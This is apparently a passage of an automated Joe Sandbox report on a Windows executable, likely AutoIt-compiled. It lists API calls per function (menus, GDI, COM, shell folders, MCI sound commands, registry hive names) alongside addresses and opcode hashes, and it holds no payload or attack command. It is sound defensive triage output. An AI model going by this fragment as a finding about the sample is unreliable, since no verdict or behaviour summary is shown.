                                                          • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 003EC1FC
                                                          • GetFocus.USER32 ref: 003EC20C
                                                          • GetDlgCtrlID.USER32(00000000), ref: 003EC217
                                                          • _memset.LIBCMT ref: 003EC342
                                                          • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 003EC36D
                                                          • GetMenuItemCount.USER32(?), ref: 003EC38D
                                                          • GetMenuItemID.USER32(?,00000000), ref: 003EC3A0
                                                          • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 003EC3D4
                                                          • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 003EC41C
                                                          • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 003EC454
                                                          • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 003EC489
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                          • String ID: 0
                                                          • API String ID: 1296962147-4108050209
                                                          • Opcode ID: 8b567ad7b4cecffacd2e43aa2f55cabec8d091083de7ce9467feab0b3a1c465f
                                                          • Instruction ID: b75bdd8c52bd0fda7597bb587c35d3579004ab67729188f9ea61d97ade5ee47c
                                                          • Opcode Fuzzy Hash: 8b567ad7b4cecffacd2e43aa2f55cabec8d091083de7ce9467feab0b3a1c465f
                                                          • Instruction Fuzzy Hash: FD818E712183A19FDB22DF16C884A6FBBE8FB88314F014A2DF995972D1C770D906CB52
                                                          APIs
                                                          • GetDC.USER32(00000000), ref: 003D738F
                                                          • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 003D739B
                                                          • CreateCompatibleDC.GDI32(?), ref: 003D73A7
                                                          • SelectObject.GDI32(00000000,?), ref: 003D73B4
                                                          • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 003D7408
                                                          • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 003D7444
                                                          • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 003D7468
                                                          • SelectObject.GDI32(00000006,?), ref: 003D7470
                                                          • DeleteObject.GDI32(?), ref: 003D7479
                                                          • DeleteDC.GDI32(00000006), ref: 003D7480
                                                          • ReleaseDC.USER32(00000000,?), ref: 003D748B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                          • String ID: (
                                                          • API String ID: 2598888154-3887548279
                                                          • Opcode ID: 084772eb107aadc615e06f6bd9649fd6a74c784462a751deb686d3f500cf5365
                                                          • Instruction ID: 97546114243909e2fcabf5df30a1f35fe066164ab8f3962686ea705f9e14c265
                                                          • Opcode Fuzzy Hash: 084772eb107aadc615e06f6bd9649fd6a74c784462a751deb686d3f500cf5365
                                                          • Instruction Fuzzy Hash: 8B514C76904209EFCB26CFA8DC84AAEBBB9EF48310F14851AF95997250D771AD408B50
                                                          APIs
                                                          • CharUpperBuffW.USER32(?,?,?,?,?,?,?,003DFDAD,?,?), ref: 003E0E31
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: BuffCharUpper
                                                          • String ID: 8]$HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                          • API String ID: 3964851224-3946851757
                                                          • Opcode ID: 33a03160edcbbadc3fb274cbf2400db9301788cebdfbdc0fdf9e806cdc467643
                                                          • Instruction ID: 84a61d1c85112a3de9fa92fa7cfa81084289e26a077c596ab975b0898f7f391d
                                                          • Opcode Fuzzy Hash: 33a03160edcbbadc3fb274cbf2400db9301788cebdfbdc0fdf9e806cdc467643
                                                          • Instruction Fuzzy Hash: BE41B03150439A8BCF1AEF10D8A2AEF3364AF11304F454565FC911B295DB789DAACBA0
                                                          APIs
                                                            • Part of subcall function 00380957: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00366B0C,?,00008000), ref: 00380973
                                                            • Part of subcall function 00364750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00364743,?,?,003637AE,?), ref: 00364770
                                                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00366BAD
                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00366CFA
                                                            • Part of subcall function 0036586D: _wcscpy.LIBCMT ref: 003658A5
                                                            • Part of subcall function 0038363D: _iswctype.LIBCMT ref: 00383645
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                          • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                          • API String ID: 537147316-1018226102
                                                          • Opcode ID: 9be4e25e71b490e8a7d70fa3b1893e89c1712b5dd173dc7e09dc73f6cad42510
                                                          • Instruction ID: 20958010e23b040b8a751b825ec6b95ce947de89cf65c95ddacaef47433f6ece
                                                          • Opcode Fuzzy Hash: 9be4e25e71b490e8a7d70fa3b1893e89c1712b5dd173dc7e09dc73f6cad42510
                                                          • Instruction Fuzzy Hash: CA02BE311083419FCB26EF24C891AAFBBE5FF95354F10892DF4959B2A2DB30D949CB52
                                                          APIs
                                                          • _memset.LIBCMT ref: 003C2D50
                                                          • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 003C2DDD
                                                          • GetMenuItemCount.USER32(00425890), ref: 003C2E66
                                                          • DeleteMenu.USER32(00425890,00000005,00000000,000000F5,?,?), ref: 003C2EF6
                                                          • DeleteMenu.USER32(00425890,00000004,00000000), ref: 003C2EFE
                                                          • DeleteMenu.USER32(00425890,00000006,00000000), ref: 003C2F06
                                                          • DeleteMenu.USER32(00425890,00000003,00000000), ref: 003C2F0E
                                                          • GetMenuItemCount.USER32(00425890), ref: 003C2F16
                                                          • SetMenuItemInfoW.USER32(00425890,00000004,00000000,00000030), ref: 003C2F4C
                                                          • GetCursorPos.USER32(?), ref: 003C2F56
                                                          • SetForegroundWindow.USER32(00000000), ref: 003C2F5F
                                                          • TrackPopupMenuEx.USER32(00425890,00000000,?,00000000,00000000,00000000), ref: 003C2F72
                                                          • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 003C2F7E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                          • String ID:
                                                          • API String ID: 3993528054-0
                                                          • Opcode ID: 0ff13af35fade2981324e2f61bd7896e7b68913b16ead91b84be95fadeaf0cf9
                                                          • Instruction ID: 6ccc0cc7b587e832c3c94ae962c3f4538fd7a4c09147ac6123a1e85b536a7f6a
                                                          • Opcode Fuzzy Hash: 0ff13af35fade2981324e2f61bd7896e7b68913b16ead91b84be95fadeaf0cf9
                                                          • Instruction Fuzzy Hash: 1771A270600259BEEB229F64DC89FABBF68FF05354F14421AF625EA1E1C7B16C10DB91
                                                          APIs
                                                          • VariantInit.OLEAUT32(?), ref: 003D88D7
                                                          • CoInitialize.OLE32(00000000), ref: 003D8904
                                                          • CoUninitialize.OLE32 ref: 003D890E
                                                          • GetRunningObjectTable.OLE32(00000000,?), ref: 003D8A0E
                                                          • SetErrorMode.KERNEL32(00000001,00000029), ref: 003D8B3B
                                                          • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,003F2C0C), ref: 003D8B6F
                                                          • CoGetObject.OLE32(?,00000000,003F2C0C,?), ref: 003D8B92
                                                          • SetErrorMode.KERNEL32(00000000), ref: 003D8BA5
                                                          • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 003D8C25
                                                          • VariantClear.OLEAUT32(?), ref: 003D8C35
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                          • String ID: ,,?
                                                          • API String ID: 2395222682-1094787077
                                                          • Opcode ID: 5c0c64602abdc4c21debcb99a27d4c37fc77db65c431f1c487796a8a8624b997
                                                          • Instruction ID: 746aae8dc4c82b6e3482aa1c36c17a9c74daf26525238c8a751cf51950231374
                                                          • Opcode Fuzzy Hash: 5c0c64602abdc4c21debcb99a27d4c37fc77db65c431f1c487796a8a8624b997
                                                          • Instruction Fuzzy Hash: 48C114B2608305AFC701DF64D88496AB7E9FF89348F00491EF98A9B261DB71ED05CB52
                                                          APIs
                                                          • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,0039E2A0,00000010,?,Bad directive syntax error,003EF910,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 003BF7C2
                                                          • LoadStringW.USER32(00000000,?,0039E2A0,00000010), ref: 003BF7C9
                                                            • Part of subcall function 00367DE1: _memmove.LIBCMT ref: 00367E22
                                                          • _wprintf.LIBCMT ref: 003BF7FC
                                                          • __swprintf.LIBCMT ref: 003BF81E
                                                          • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 003BF88D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
                                                          • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                          • API String ID: 1506413516-4153970271
                                                          • Opcode ID: 7b6ada2ce4853b7387d1ec0b6cb46fef6f70de5f2a68a5cac7e0759be7a21dcd
                                                          • Instruction ID: bc008beeb485bf39a46aa74906f94a25dd616f096297ed4a6b57c3531926154e
                                                          • Opcode Fuzzy Hash: 7b6ada2ce4853b7387d1ec0b6cb46fef6f70de5f2a68a5cac7e0759be7a21dcd
                                                          • Instruction Fuzzy Hash: B6213C3290021EEFCF13AF90CC4AEEE7779BF18304F04486AF5156A1A2EA719658DB51
                                                          APIs
                                                            • Part of subcall function 00367BCC: _memmove.LIBCMT ref: 00367C06
                                                            • Part of subcall function 00367924: _memmove.LIBCMT ref: 003679AD
                                                          • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 003C5330
                                                          • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 003C5346
                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 003C5357
                                                          • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 003C5369
                                                          • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 003C537A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: SendString$_memmove
                                                          • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                          • API String ID: 2279737902-1007645807
                                                          • Opcode ID: 5c965bb7f71f457169cbf1d251d3f40f89602751e635fc96a3572c32502edf73
                                                          • Instruction ID: e45ef0be6072be581803c245f6ae6a1f44f8efa3fd3e087cfd17244bdc49f000
                                                          • Opcode Fuzzy Hash: 5c965bb7f71f457169cbf1d251d3f40f89602751e635fc96a3572c32502edf73
                                                          • Instruction Fuzzy Hash: 29118231A5016979D721B661CC4AFFF7BBCEBD5B84F50042EB411E60D5DEA01D84CAA4
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                          • String ID: 0.0.0.0
                                                          • API String ID: 208665112-3771769585
                                                          • Opcode ID: d894d4ec1f83ed4283f7690834220d2bb78acfa263f1123b50d5c11474dbd5d1
                                                          • Instruction ID: 20edce0676322692a08db4af5df5a25c749d8c4fa272f21b0a8a73dbc74a8a7d
                                                          • Opcode Fuzzy Hash: d894d4ec1f83ed4283f7690834220d2bb78acfa263f1123b50d5c11474dbd5d1
                                                          • Instruction Fuzzy Hash: 8011D531900214AFCB27BB309C86FDA77BCEB01711F0502BAF855DA091EFB59E858750
                                                          APIs
                                                          • timeGetTime.WINMM ref: 003C4F7A
                                                            • Part of subcall function 0038049F: timeGetTime.WINMM(?,7707B400,00370E7B), ref: 003804A3
                                                          • Sleep.KERNEL32(0000000A), ref: 003C4FA6
                                                          • EnumThreadWindows.USER32(?,Function_00064F28,00000000), ref: 003C4FCA
                                                          • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 003C4FEC
                                                          • SetActiveWindow.USER32 ref: 003C500B
                                                          • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 003C5019
                                                          • SendMessageW.USER32(00000010,00000000,00000000), ref: 003C5038
                                                          • Sleep.KERNEL32(000000FA), ref: 003C5043
                                                          • IsWindow.USER32 ref: 003C504F
                                                          • EndDialog.USER32(00000000), ref: 003C5060
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                          • String ID: BUTTON
                                                          • API String ID: 1194449130-3405671355
                                                          • Opcode ID: b3df05cc126145e132f874779a8ed5799d08a00a75e5059587117f619a1ea79f
                                                          • Instruction ID: c483e73b72d4bac21d754b2f7802e5e924b264e983573ee246d47fe59309a152
                                                          • Opcode Fuzzy Hash: b3df05cc126145e132f874779a8ed5799d08a00a75e5059587117f619a1ea79f
                                                          • Instruction Fuzzy Hash: 20215470204644BFE7325B20ECC8F263A6DEB55749F46113CF501CA1E1CAB19E919B66
                                                          APIs
                                                            • Part of subcall function 00369837: __itow.LIBCMT ref: 00369862
                                                            • Part of subcall function 00369837: __swprintf.LIBCMT ref: 003698AC
                                                          • CoInitialize.OLE32(00000000), ref: 003CD5EA
                                                          • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 003CD67D
                                                          • SHGetDesktopFolder.SHELL32(?), ref: 003CD691
                                                          • CoCreateInstance.OLE32(003F2D7C,00000000,00000001,00418C1C,?), ref: 003CD6DD
                                                          • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 003CD74C
                                                          • CoTaskMemFree.OLE32(?,?), ref: 003CD7A4
                                                          • _memset.LIBCMT ref: 003CD7E1
                                                          • SHBrowseForFolderW.SHELL32(?), ref: 003CD81D
                                                          • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 003CD840
                                                          • CoTaskMemFree.OLE32(00000000), ref: 003CD847
                                                          • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 003CD87E
                                                          • CoUninitialize.OLE32(00000001,00000000), ref: 003CD880
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                          • String ID:
                                                          • API String ID: 1246142700-0
                                                          • Opcode ID: 087ce328a5b96a264dd67fc81942dde9a770e29dcb4b90185c883ffc03dd9672
                                                          • Instruction ID: e7c9af46e04fd33ff54d975446f107e2be1e60160744028c00d8ef4b072e064d
                                                          • Opcode Fuzzy Hash: 087ce328a5b96a264dd67fc81942dde9a770e29dcb4b90185c883ffc03dd9672
                                                          • Instruction Fuzzy Hash: 33B1F975A00109AFDB15DFA4C885EAEBBB9FF48304F1485A9F909EB261DB30ED45CB50
                                                          APIs
                                                          • GetDlgItem.USER32(?,00000001), ref: 003BC283
                                                          • GetWindowRect.USER32(00000000,?), ref: 003BC295
                                                          • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 003BC2F3
                                                          • GetDlgItem.USER32(?,00000002), ref: 003BC2FE
                                                          • GetWindowRect.USER32(00000000,?), ref: 003BC310
                                                          • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 003BC364
                                                          • GetDlgItem.USER32(?,000003E9), ref: 003BC372
                                                          • GetWindowRect.USER32(00000000,?), ref: 003BC383
                                                          • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 003BC3C6
                                                          • GetDlgItem.USER32(?,000003EA), ref: 003BC3D4
                                                          • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 003BC3F1
                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 003BC3FE
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: Window$ItemMoveRect$Invalidate
                                                          • String ID:
                                                          • API String ID: 3096461208-0
                                                          • Opcode ID: 5bc63f73efca4f3e5d63334ab7ff9499d4651afc3b222d9bc9b679d2c14af982
                                                          • Instruction ID: 0cc4d3675484d8d0307853c010ad93c73823edccd7a8f888986324696ef948bd
                                                          • Opcode Fuzzy Hash: 5bc63f73efca4f3e5d63334ab7ff9499d4651afc3b222d9bc9b679d2c14af982
                                                          • Instruction Fuzzy Hash: 47514571B10205AFDF19CFA9DD95AAEBBBAEB88710F14852DF619D72D0D7B09D008B10
                                                          APIs
                                                            • Part of subcall function 00361B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00362036,?,00000000,?,?,?,?,003616CB,00000000,?), ref: 00361B9A
                                                          • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 003620D3
                                                          • KillTimer.USER32(-00000001,?,?,?,?,003616CB,00000000,?,?,00361AE2,?,?), ref: 0036216E
                                                          • DestroyAcceleratorTable.USER32(00000000), ref: 0039BCA6
                                                          • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,003616CB,00000000,?,?,00361AE2,?,?), ref: 0039BCD7
                                                          • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,003616CB,00000000,?,?,00361AE2,?,?), ref: 0039BCEE
                                                          • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,003616CB,00000000,?,?,00361AE2,?,?), ref: 0039BD0A
                                                          • DeleteObject.GDI32(00000000), ref: 0039BD1C
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                          • String ID:
                                                          • API String ID: 641708696-0
                                                          • Opcode ID: 978596c4a0a4317b8916a04c6c44012a6e8cdd63344d66a6efb6e790501c57a7
                                                          • Instruction ID: bb28aab3e1e019db7ebe4f3dec72326c906aee24782f1994472ea162c4f511d2
                                                          • Opcode Fuzzy Hash: 978596c4a0a4317b8916a04c6c44012a6e8cdd63344d66a6efb6e790501c57a7
                                                          • Instruction Fuzzy Hash: 88618C30201A50DFCB37AF14D988B2AB7F5FB40312F52C529E5429B9B8C7B4A891DF54
                                                          APIs
                                                            • Part of subcall function 003625DB: GetWindowLongW.USER32(?,000000EB), ref: 003625EC
                                                          • GetSysColor.USER32(0000000F), ref: 003621D3
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
